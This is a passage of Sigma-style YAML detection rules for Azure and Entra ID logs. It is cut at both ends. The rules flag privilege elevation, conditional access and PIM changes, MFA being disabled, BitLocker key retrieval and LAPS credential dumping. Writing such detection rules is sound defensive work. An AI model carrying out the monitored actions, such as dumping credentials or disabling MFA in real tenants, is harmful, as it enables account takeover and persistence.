references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization author: Austin Songer @austinsonger date: 2021-11-26 modified: 2022-08-23 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078.004 logsource: product: azure service: activitylogs detection: selection: operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION condition: selection falsepositives: - If this was approved by System Administrator. level: high ================================================ FILE: rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml ================================================ title: Azure Suppression Rule Created id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 status: test description: Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE condition: selection falsepositives: - Suppression Rule being created may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml ================================================ title: Azure Virtual Network Modified or Deleted id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f status: test description: Identifies when a Virtual Network is modified or deleted in Azure. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName|startswith: - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ - MICROSOFT.NETWORK/VIRTUALNETWORKS/ operationName|endswith: - /WRITE - /DELETE condition: selection falsepositives: - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml ================================================ title: Azure VPN Connection Modified or Deleted id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 status: test description: Identifies when a VPN connection is modified or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE condition: selection falsepositives: - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml ================================================ title: CA Policy Removed by Non Approved Actor id: 26e7c5e2-6545-481e-b7e6-050143459635 status: test description: Monitor and alert on conditional access changes where non approved actor removed CA Policy. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access author: Corissa Koopmans, '@corissalea' date: 2022-07-19 tags: - attack.privilege-escalation - attack.credential-access - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1556 logsource: product: azure service: auditlogs detection: selection: properties.message: Delete conditional access policy condition: selection falsepositives: - Misconfigured role permissions - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 
level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml ================================================ title: CA Policy Updated by Non Approved Actor id: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc status: test description: Monitor and alert on conditional access changes. Check whether the initiating actor is approved to make such changes, and review the Modified Properties, comparing the "old" and "new" values. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access author: Corissa Koopmans, '@corissalea' date: 2022-07-19 modified: 2024-05-28 tags: - attack.privilege-escalation - attack.credential-access - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1556 logsource: product: azure service: auditlogs detection: selection: properties.message: Update conditional access policy condition: selection falsepositives: - Misconfigured role permissions - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml ================================================ title: New CA Policy by Non-approved Actor id: 0922467f-db53-4348-b7bf-dee8d0d348c6 status: test description: Monitor and alert on conditional access changes. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure author: Corissa Koopmans, '@corissalea' date: 2022-07-18 tags: - attack.privilege-escalation - attack.defense-evasion - attack.t1548 logsource: product: azure service: auditlogs detection: selection: properties.message: Add conditional access policy condition: selection falsepositives: - Misconfigured role permissions - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml ================================================ title: Account Created And Deleted Within A Close Time Frame id: 6f583da0-3a90-4566-a4ed-83c09fe18bbf status: test description: Detects when an account was created and deleted in a short period of time. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton date: 2022-08-11 modified: 2022-08-18 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078 logsource: product: azure service: auditlogs detection: selection: properties.message: - Add user - Delete user Status: Success condition: selection falsepositives: - Legit administrative action level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml ================================================ title: Bitlocker Key Retrieval id: a0413867-daf3-43dd-9245-734b3a787942 status: test description: Monitor and alert for Bitlocker key retrieval. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval author: Michael Epping, '@mepples21' date: 2022-06-28 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: Category: KeyManagement OperationName: Read BitLocker key condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml ================================================ title: Certificate-Based Authentication Enabled id: c2496b41-16a9-4016-a776-b23f8910dc58 status: test description: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant. references: - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ author: Harjot Shah Singh, '@cyb3rjy0t' date: 2024-03-26 tags: - attack.defense-evasion - attack.credential-access - attack.persistence - attack.privilege-escalation - attack.t1556 logsource: product: azure service: auditlogs detection: selection: OperationName: 'Authentication Methods Policy Update' TargetResources.modifiedProperties|contains: 'AuthenticationMethodsPolicy' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml ================================================ title: Changes to Device Registration Policy id: 9494bff8-959f-4440-bbce-fb87a208d517 status: test description: Monitor and alert for changes to the device registration policy. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy author: Michael Epping, '@mepples21' date: 2022-06-28 tags: - attack.defense-evasion - attack.privilege-escalation - attack.t1484 logsource: product: azure service: auditlogs detection: selection: Category: 'Policy' ActivityDisplayName: 'Set device registration policies' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml ================================================ title: Guest Users Invited To Tenant By Non Approved Inviters id: 4ad97bf5-a514-41a4-abd3-4f3455ad4865 status: test description: Detects guest users being invited to tenant by non-approved inviters references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins author: MikeDuddington, '@dudders1' date: 2022-07-28 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: product: azure service: auditlogs detection: selection: Category: 'UserManagement' OperationName: 'Invite external user' filter: InitiatedBy|contains: '' condition: selection and not filter falsepositives: - If this was approved by System Administrator. level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml ================================================ title: New Root Certificate Authority Added id: 4bb80281-3756-4ec8-a88e-523c5a6fda9e status: test description: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication. 
references: - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ author: Harjot Shah Singh, '@cyb3rjy0t' date: 2024-03-26 tags: - attack.defense-evasion - attack.credential-access - attack.persistence - attack.privilege-escalation - attack.t1556 logsource: product: azure service: auditlogs detection: selection: OperationName: 'Set Company Information' TargetResources.modifiedProperties.newValue|contains: 'TrustedCAsForPasswordlessAuth' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml ================================================ title: Users Added to Global or Device Admin Roles id: 11c767ae-500b-423b-bae3-b234450736ed status: test description: Monitor and alert for users added to device admin roles. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles author: Michael Epping, '@mepples21' date: 2022-06-28 tags: - attack.persistence - attack.initial-access - attack.defense-evasion - attack.privilege-escalation - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: Category: RoleManagement OperationName|contains|all: - 'Add' - 'member to role' TargetResources|contains: - '7698a772-787b-4ac8-901f-60d6b08affd2' - '62e90394-69f5-4237-9190-012177145e10' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml ================================================ title: Application AppID Uri Configuration Changes id: 1b45b0d1-773f-4f23-aedc-814b759563b1 status: test description: Detects when a configuration change is made to an applications AppID URI. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-06-02 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.credential-access - attack.privilege-escalation - attack.t1552 - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: - Update Application - Update Service principal condition: selection falsepositives: - When an administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event. level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_credential_added.yml ================================================ title: Added Credentials to Existing Application id: cbb67ecc-fb70-4467-9350-c910bdf7c628 status: test description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-05-26 modified: 2025-07-18 tags: - attack.privilege-escalation - attack.t1098.001 - attack.persistence logsource: product: azure service: auditlogs detection: selection: properties.message: - Update application – Certificates and secrets management - Update Service principal/Update Application condition: selection falsepositives: - When credentials are added/removed as part of the normal working hours/workflows level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml ================================================ title: Delegated Permissions Granted For All Users id: a6355fbe-f36f-45d8-8efc-ab42465cbc52 status: test description: Detects when highly privileged delegated permissions are granted on behalf of all users references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022-07-28 tags: - attack.credential-access - attack.t1528 logsource: product: azure service: auditlogs detection: selection: properties.message: Add delegated permission grant condition: selection falsepositives: - When the permission is legitimately needed for the app level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml ================================================ title: End User Consent id: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a status: test description: Detects when an end user consents to an application references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent author: Bailey Bercik '@baileybercik', Mark 
Morowczynski '@markmorow' date: 2022-07-28 tags: - attack.credential-access - attack.t1528 logsource: product: azure service: auditlogs detection: selection: ConsentContext.IsAdminConsent: 'false' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml ================================================ title: End User Consent Blocked id: 7091372f-623c-4293-bc37-20c32b3492be status: test description: Detects when end user consent is blocked due to risk-based consent. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022-07-10 tags: - attack.credential-access - attack.t1528 logsource: product: azure service: auditlogs detection: selection: failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_owner_added.yml ================================================ title: Added Owner To Application id: 74298991-9fc4-460e-a92e-511aa60baec1 status: test description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-06-02 tags: - attack.t1552 - attack.credential-access logsource: product: azure service: auditlogs detection: selection: properties.message: Add owner to application condition: selection falsepositives: - When a new application owner is added by an administrator level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml ================================================ title: App Granted Microsoft Permissions id: c1d147ae-a951-48e5-8b41-dcd0170c7213 status: test description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022-07-10 tags: - attack.credential-access - attack.t1528 logsource: product: azure service: auditlogs detection: selection: properties.message: - Add delegated permission grant - Add app role assignment to service principal condition: selection falsepositives: - When the permission is legitimately needed for the app level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml ================================================ title: App Granted Privileged Delegated Or App Permissions id: 5aecf3d5-f8a0-48e7-99be-3a759df7358f related: - id: ba2a7c80-027b-460f-92e2-57d113897dbc type: obsolete status: test description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions references: - 
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022-07-28 modified: 2023-03-29 tags: - attack.persistence - attack.privilege-escalation - attack.t1098.003 logsource: product: azure service: auditlogs detection: selection: properties.message: Add app role assignment to service principal condition: selection falsepositives: - When the permission is legitimately needed for the app level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_role_added.yml ================================================ title: App Assigned To Azure RBAC/Microsoft Entra Role id: b04934b2-0a68-4845-8a19-bdfed3a68a7a status: test description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022-07-19 modified: 2024-11-04 tags: - attack.persistence - attack.privilege-escalation - attack.t1098.003 logsource: product: azure service: auditlogs detection: selection: targetResources.type: 'Service Principal' properties.message: - Add member to role - Add eligible member to role - Add scoped member to role condition: selection falsepositives: - When the permission is legitimately needed for the app level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml ================================================ title: Application URI Configuration Changes id: 0055ad1f-be85-4798-83cf-a6da17c993b3 status: test description: | Detects when a configuration change is made to an applications URI. 
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-06-02 tags: - attack.initial-access - attack.defense-evasion - attack.t1528 - attack.t1078.004 - attack.persistence - attack.credential-access - attack.privilege-escalation logsource: product: azure service: auditlogs detection: selection: properties.message: Update Application Sucess- Property Name AppAddress condition: selection falsepositives: - When an administrator is making legitimate URI configuration changes to an application. This should be a planned event. level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml ================================================ title: Windows LAPS Credential Dump From Entra ID id: a4b25073-8947-489c-a8dd-93b41c23f26d status: test description: Detects when an account dumps the LAPS password from Entra ID. 
references: - https://twitter.com/NathanMcNulty/status/1785051227568632263 - https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/ - https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487 author: andrewdanis date: 2024-06-26 tags: - attack.privilege-escalation - attack.persistence - attack.t1098.005 logsource: product: azure service: auditlogs detection: selection: category: 'Device' activityType|contains: 'Recover device local administrator password' additionalDetails.additionalInfo|contains: 'Successfully recovered local credential by device id' condition: selection falsepositives: - Approved activity performed by an Administrator. level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml ================================================ title: Change to Authentication Method id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 status: test description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: AlertIQ date: 2021-10-10 modified: 2022-12-25 tags: - attack.privilege-escalation - attack.credential-access - attack.t1556 - attack.persistence - attack.defense-evasion - attack.t1098 logsource: product: azure service: auditlogs detection: selection: LoggedByService: 'Authentication Methods' Category: 'UserManagement' OperationName: 'User registered security info' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_federation_modified.yml ================================================ title: Azure Domain Federation Settings Modified id: 352a54e1-74ba-4929-9d47-8193d67aba1e status: test description: Identifies when a user or application modifies the federation settings on the domain. references: - https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes author: Austin Songer date: 2021-09-06 modified: 2022-06-08 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: product: azure service: auditlogs detection: selection: ActivityDisplayName: Set federation settings on domain condition: selection falsepositives: - Federation Settings being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml ================================================ title: User Added To Group With CA Policy Modification Access id: 91c95675-1f27-46d0-bead-d1ae96b97cd3 status: test description: Monitor and alert on group membership additions of groups that have CA policy modification access references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' date: 2022-08-04 tags: - attack.privilege-escalation - attack.credential-access - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1556 logsource: product: azure service: auditlogs detection: selection: properties.message: Add member from group condition: selection falsepositives: - User removed from the group is approved level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml ================================================ title: User Removed From Group With CA Policy Modification Access id: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c status: test description: Monitor and alert on group membership removal of groups that have CA policy modification access references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' date: 2022-08-04 tags: - attack.privilege-escalation - attack.credential-access - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1556 logsource: product: azure service: auditlogs detection: selection: properties.message: Remove member from group condition: selection falsepositives: - User removed from the group is approved level: medium ================================================ FILE: 
rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml ================================================ title: Guest User Invited By Non Approved Inviters id: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9 status: test description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-10 tags: - attack.privilege-escalation - attack.initial-access - attack.persistence - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: Invite external user Status: failure condition: selection falsepositives: - A non malicious user is unaware of the proper process level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_guest_to_member.yml ================================================ title: User State Changed From Guest To Member id: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e status: test description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins author: MikeDuddington, '@dudders1' date: 2022-06-30 tags: - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: Category: 'UserManagement' OperationName: 'Update user' properties.message: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"' condition: selection falsepositives: - If this was approved by System Administrator. 
level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml ================================================ title: PIM Approvals And Deny Elevation id: 039a7469-0296-4450-84c0-f6966b16dc6d status: test description: Detects when a PIM elevation is approved or denied. Approvals or denials outside of normal operations should be investigated. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-09 tags: - attack.persistence - attack.initial-access - attack.defense-evasion - attack.privilege-escalation - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: Request Approved/Denied condition: selection falsepositives: - Actual admin using PIM. level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml ================================================ title: PIM Alert Setting Changes To Disabled id: aeaef14c-e5bf-4690-a9c8-835caad458bd status: test description: Detects when PIM alerts are set to disabled. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-09 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1078 logsource: product: azure service: auditlogs detection: selection: properties.message: Disable PIM Alert condition: selection falsepositives: - Administrator disabling PIM alerts as an active choice. 
level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_pim_change_settings.yml ================================================ title: Changes To PIM Settings id: db6c06c4-bf3b-421c-aa88-15672b88c743 status: test description: Detects when changes are made to PIM roles references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-09 tags: - attack.initial-access - attack.defense-evasion - attack.privilege-escalation - attack.persistence - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: Update role setting in PIM condition: selection falsepositives: - Legit administrative PIM setting configuration changes level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml ================================================ title: User Added To Privilege Role id: 49a268a4-72f4-4e38-8a7b-885be690c5b5 status: test description: Detects when a user is added to a privileged role. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-06 tags: - attack.persistence - attack.initial-access - attack.privilege-escalation - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: - Add eligible member (permanent) - Add eligible member (eligible) condition: selection falsepositives: - Legitimate administrator actions of adding members to a role level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml ================================================ title: Bulk Deletion Changes To Privileged Account Permissions id: 102e11e3-2db5-4c9e-bc26-357d42585d21 status: test description: Detects when a user is removed from a privileged role. Bulk changes should be investigated. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-05 tags: - attack.privilege-escalation - attack.persistence - attack.t1098 logsource: product: azure service: auditlogs detection: selection: properties.message: - Remove eligible member (permanent) - Remove eligible member (eligible) condition: selection falsepositives: - Legitimate administrator actions of removing members from a role level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml ================================================ title: Privileged Account Creation id: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947 status: test description: Detects when a new admin is created. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton date: 2022-08-11 modified: 2022-08-16 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message|contains|all: - Add user - Add member to role Status: Success condition: selection falsepositives: - A legitimate new admin account being created level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml ================================================ title: Azure Subscription Permission Elevation Via AuditLogs id: ca9bf243-465e-494a-9e54-bf9fc239057d status: test description: | Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation author: Austin Songer @austinsonger date: 2021-11-26 modified: 2022-12-25 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: product: azure service: auditlogs detection: selection: Category: 'Administrative' OperationName: 'Assigns the caller to user access admin' condition: selection falsepositives: - If this was approved by System Administrator. 
level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_tap_added.yml ================================================ title: Temporary Access Pass Added To An Account id: fa84aaf5-8142-43cd-9ec2-78cfebf878ce status: test description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' date: 2022-08-10 tags: - attack.privilege-escalation - attack.initial-access - attack.defense-evasion - attack.persistence - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: properties.message: Admin registered security info Status: Admin registered temporary access pass method for user condition: selection falsepositives: - Administrator adding a legitimate temporary access pass level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml ================================================ title: User Risk and MFA Registration Policy Updated id: d4c7758e-9417-4f2e-9109-6125d66dabef status: test description: | Detects changes and updates to the user risk and MFA registration policy. Attackers can modify the policies to bypass MFA, weaken security thresholds, facilitate further attacks, or maintain persistence. 
references: - https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities author: Harjot Singh (@cyb3rjy0t) date: 2024-08-13 tags: - attack.persistence logsource: product: azure service: auditlogs detection: selection: LoggedByService: 'AAD Management UX' Category: 'Policy' OperationName: 'Update User Risk and MFA Registration Policy' condition: selection falsepositives: - Known updates by administrators. level: high ================================================ FILE: rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml ================================================ title: Multi Factor Authentication Disabled For User Account id: b18454c8-0be3-41f7-86bc-9c614611b839 status: test description: | Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors have been seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. This is also seen in SIM swap attacks. references: - https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/ author: Harjot Singh (@cyb3rjy0t) date: 2024-08-21 tags: - attack.credential-access - attack.persistence logsource: product: azure service: auditlogs definition: 'Requirements: The TargetResources array needs to be mapped accurately in order for this rule to work' detection: selection: LoggedByService: 'Core Directory' Category: 'UserManagement' OperationName: 'Update user' TargetResources.ModifiedProperties.DisplayName: 'StrongAuthenticationRequirement' TargetResources.ModifiedProperties.NewValue|contains: "State\":0" condition: selection falsepositives: - Legitimate authorized activity. 
level: medium ================================================ FILE: rules/cloud/azure/audit_logs/azure_user_password_change.yml ================================================ title: Password Reset By User Account id: 340ee172-4b67-4fb4-832f-f961bdc1f3aa status: test description: Detects when a user has reset their password in Azure AD references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: YochanaHenderson, '@Yochana-H' date: 2022-08-03 tags: - attack.privilege-escalation - attack.initial-access - attack.defense-evasion - attack.persistence - attack.credential-access - attack.t1078.004 logsource: product: azure service: auditlogs detection: selection: Category: 'UserManagement' Status: 'Success' Initiatedby: 'UPN' filter: Target|contains: 'UPN' ActivityType|contains: 'Password reset' condition: selection and filter falsepositives: - If this was approved by System Administrator or confirmed user action. level: medium ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml ================================================ title: Anomalous Token id: 6555754e-5e7f-4a67-ad1c-4041c413a007 status: test description: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar 